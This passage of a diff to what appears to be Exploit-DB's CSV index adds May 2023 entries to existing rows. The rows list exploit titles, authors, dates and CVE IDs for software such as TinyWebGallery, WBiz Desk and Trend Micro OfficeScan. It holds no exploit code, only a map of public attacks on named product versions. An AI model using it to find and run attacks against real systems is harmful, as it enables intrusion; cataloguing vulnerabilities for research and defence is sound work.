47814,exploits/php/webapps/47814.txt,"Thrive Smart Home 1.1 - Authentication Bypass",2019-12-30,LiquidWorm,webapps,php,,2019-12-30,2019-12-30,0,,,,,,
47583,exploits/php/webapps/47583.txt,"thrsrossi Millhouse-Project 1.414 - 'content' Persistent Cross-Site Scripting",2019-11-05,cakes,webapps,php,80,2019-11-05,2019-11-05,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comMillhouse-Project-master.zip,
+51450,exploits/php/webapps/51450.php,"thrsrossi Millhouse-Project 1.414 - Remote Code Execution",2023-05-23,"Chokri Hammedi",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
27687,exploits/php/webapps/27687.txt,"ThWboard 2.8 - 'showtopic.php' SQL Injection",2006-04-19,Qex,webapps,php,,2006-04-19,2013-08-19,1,CVE-2006-1926;OSVDB-27435,,,,,https://www.securityfocus.com/bid/17606/info
27711,exploits/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",webapps,php,,2006-04-20,2013-08-20,1,CVE-2006-2037;OSVDB-25210,,,,,https://www.securityfocus.com/bid/17627/info
3124,exploits/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,webapps,php,,2007-01-13,2016-09-21,1,OSVDB-32837;CVE-2007-0340,,,,http://www.exploit-db.comthwb-300-beta-2.84-php5.tar.gz,
@@ -30661,6 +30689,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",webapps,php,,2011-02-01,2012-06-22,0,OSVDB-70743,,,,http://www.exploit-db.comtwg183.zip,
18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,webapps,php,,2012-01-06,2012-01-06,0,OSVDB-82603;OSVDB-82481;CVE-2012-5347,,,,,
36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,webapps,php,,2011-08-31,2015-02-16,1,,,,,,https://www.securityfocus.com/bid/49393/info
+51443,exploits/php/webapps/51443.txt,"TinyWebGallery v2.5 - Remote Code Execution (RCE)",2023-05-23,"Mirabbas Ağalarov",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
51442,exploits/php/webapps/51442.txt,"TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Mirabbas Ağalarov",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,webapps,php,,2008-06-25,2016-12-09,1,OSVDB-46526;CVE-2008-5168,,,,,
23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,webapps,php,,2012-12-12,2012-12-12,0,OSVDB-88394;OSVDB-88393,,,,http://www.exploit-db.comTipsOfTheDay.zip,
@@ -31785,6 +31814,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,,
50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
+51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php,,2018-05-21,2018-05-22,0,,,,,,
@@ -32015,6 +32045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22812,exploits/php/webapps/22812.txt,"WebJeff FileManager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",webapps,php,,2003-06-20,2012-11-18,1,,,,,,https://www.securityfocus.com/bid/7995/info
3717,exploits/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,webapps,php,,2007-04-11,,1,OSVDB-35747;CVE-2007-2307,,,,,
38024,exploits/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",webapps,php,,2012-07-19,2015-08-31,1,CVE-2012-5851;OSVDB-87521,,,,,https://www.securityfocus.com/bid/56570/info
+51465,exploits/php/webapps/51465.txt,"Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)",2023-05-23,"Astik Rawat",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-30256,,,,,
9164,exploits/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password",2009-07-16,TiGeR-Dz,webapps,php,,2009-07-15,,1,,,,,,
9162,exploits/php/webapps/9162.txt,"WebLeague 2.2.0 - 'profile.php' SQL Injection",2009-07-15,Arka69,webapps,php,,2009-07-14,,1,OSVDB-61553;CVE-2009-4560,,,,,
9165,exploits/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,webapps,php,,2009-07-15,,1,OSVDB-61554;CVE-2009-4561,,,,,
@@ -32512,6 +32543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",webapps,php,,2012-07-02,2012-07-04,1,OSVDB-83701,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt20000/backup.png,http://www.exploit-db.combackup.2.0.1.zip,
50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",2021-11-08,"Murat DEMİRCİ",webapps,php,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.combackup-and-restore-for-wp.1.0.3.zip,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",2021-07-05,"Ron Jost",webapps,php,,2021-07-05,2021-07-05,0,CVE-2021-24155,,,,http://www.exploit-db.combackup.1.5.8.zip,
+51445,exploits/php/webapps/51445.txt,"WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup",2023-05-23,Wadeek,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
4593,exploits/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,webapps,php,,2007-10-31,,1,OSVDB-38479;CVE-2007-5800;OSVDB-38478;OSVDB-38477;OSVDB-38476,"WordPress Plugin",,,,
17056,exploits/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution",2011-03-28,"Sense of Security",webapps,php,,2011-03-28,2011-03-28,0,OSVDB-71481;CVE-2011-4342,"WordPress Plugin",,,,http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
35400,exploits/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",webapps,php,,2011-02-28,2014-11-30,1,,,,,,https://www.securityfocus.com/bid/46610/info
@@ -34481,6 +34513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
+51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
40236,exploits/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,webapps,ruby,80,2016-08-15,2016-08-15,0,CVE-2016-4340,,,,,
@@ -39960,6 +39993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32205,exploits/windows/local/32205.txt,"Huawei Technologies eSpace Meeting Service 1.0.0.23 - Local Privilege Escalation",2014-03-12,LiquidWorm,local,windows,,2014-03-12,2014-03-12,0,OSVDB-104323;CVE-2014-3222,,,,,http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-329170.htm
21988,exploits/windows/local/21988.pl,"Huawei Technologies Internet Mobile - Unicode (SEH)",2012-10-15,Dark-Puzzle,local,windows,,2012-10-15,2012-10-15,0,OSVDB-87008;CVE-2012-6568,,,,,
40807,exploits/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",local,windows,,2016-11-22,2016-11-22,1,CVE-2016-8769,,,,,
+51461,exploits/windows/local/51461.txt,"Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking",2023-05-23,"Ahsan Azad",local,windows,,2023-05-23,2023-05-23,0,,,,,,
35177,exploits/windows/local/35177.py,"i-FTP 2.20 - Local Buffer Overflow (SEH)",2014-11-06,metacom,local,windows,,2014-11-06,2016-10-10,1,OSVDB-114279,,,,http://www.exploit-db.comiftp-win32-v220.exe,
35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows,,2015-01-01,2015-01-01,1,OSVDB-114279,"Metasploit Framework (MSF)",,,http://www.exploit-db.comiftp-win32-v220.exe,
35040,exploits/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous",local,windows,,2014-10-22,2014-10-22,0,CVE-2014-5507;OSVDB-113675,,,,,
@@ -40700,6 +40734,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18657,exploits/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",local,windows,,2012-03-23,2012-05-27,1,OSVDB-80532,,,http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-05-27-at-21851-pm.png,http://www.exploit-db.commmplayer.zip,
47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,,2019-09-27,2019-10-03,0,,,,,,
47667,exploits/windows/local/47667.txt,"MobileGo 8.5.0 - Insecure File Permissions",2019-11-18,ZwX,local,windows,,2019-11-18,2019-11-18,0,,,,,,
+51479,exploits/windows/local/51479.txt,"MobileTrans 4.0.11 - Weak Service Privilege Escalation",2023-05-23,"Thurein Soe",local,windows,,2023-05-23,2023-05-23,0,CVE-2023-31748,,,,,
36053,exploits/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",local,windows,,2015-02-11,2015-02-11,0,OSVDB-118128,,,,http://www.exploit-db.commooplayer-1.3.0.zip,
36819,exploits/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",local,windows,,2015-04-22,2015-04-22,1,OSVDB-118128,,,http://www.exploit-db.com/screenshots/idlt37000/screen-shot-2015-04-22-at-70835-pm.png,http://www.exploit-db.commooplayer-1.3.0.zip,
13942,exploits/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,local,windows,,2010-06-19,,1,CVE-2010-2439;OSVDB-65789,,,http://www.exploit-db.com/screenshots/idlt14000/13942.png,http://www.exploit-db.comMoreAmp-0.1.25-binWin.zip,
@@ -41313,6 +41348,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47940,exploits/windows/local/47940.txt,"Trend Micro Maximum Security 2019 - Arbitrary Code Execution",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
47943,exploits/windows/local/47943.txt,"Trend Micro Maximum Security 2019 - Privilege Escalation",2020-01-17,hyp3rlinx,local,windows,,2020-01-17,2020-01-17,0,,,,,,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,,2017-09-28,2017-09-28,1,,,,,,
+51453,exploits/windows/local/51453.txt,"Trend Micro OfficeScan Client 10.0 - ACL Service LPE",2023-05-23,msd0pe,local,windows,,2023-05-23,2023-05-23,0,,,,,,
15376,exploits/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel",2010-11-01,"Nikita Tarakanov",local,windows,,2010-11-01,2010-11-12,1,OSVDB-69018,,,,http://www.exploit-db.comTrend_Micro.exe,
44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,,2018-06-08,2018-06-08,1,CVE-2018-10507,,,,,
50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",2022-01-05,"Yehia Elghaly",local,windows,,2022-01-05,2022-01-05,0,,,,,http://www.exploit-db.comRemote_System_monitor_Server_3.61_x86_Setup.exe,
@@ -45332,6 +45368,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42154,exploits/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",webapps,windows,,2017-06-11,2017-06-11,1,,,,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2017-06-11-at-112909.png,http://www.exploit-db.comecssetup.exe,
47811,exploits/windows/webapps/47811.txt,"elearning-script 1.0 - Authentication Bypass",2019-12-30,riamloo,webapps,windows,,2019-12-30,2019-12-30,0,,,,,,
20349,exploits/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2591;OSVDB-84520,,,http://www.exploit-db.com/screenshots/idlt20500/emailarchitect-payload-0.png,,
+51467,exploits/windows/webapps/51467.txt,"eScan Management Console 14.0.1400.2281 - Cross Site Scripting",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31703,,,,,
+51466,exploits/windows/webapps/51466.txt,"eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)",2023-05-23,"Sahil Ojha",webapps,windows,,2023-05-23,2023-05-23,0,CVE-2023-31702,,,,,
20350,exploits/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,webapps,windows,,2012-08-08,2012-08-08,1,CVE-2012-2590;OSVDB-84747,,,http://www.exploit-db.com/screenshots/idlt20500/supportportal-payload-0.png,,
45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows,,2018-09-03,2018-09-03,0,CVE-2018-16252,"XML External Entity (XXE)",,,http://www.exploit-db.comelex_setup.exe,
38379,exploits/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,webapps,windows,,2015-10-02,2015-10-02,0,OSVDB-128434;OSVDB-128433;OSVDB-128432,,,,,http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt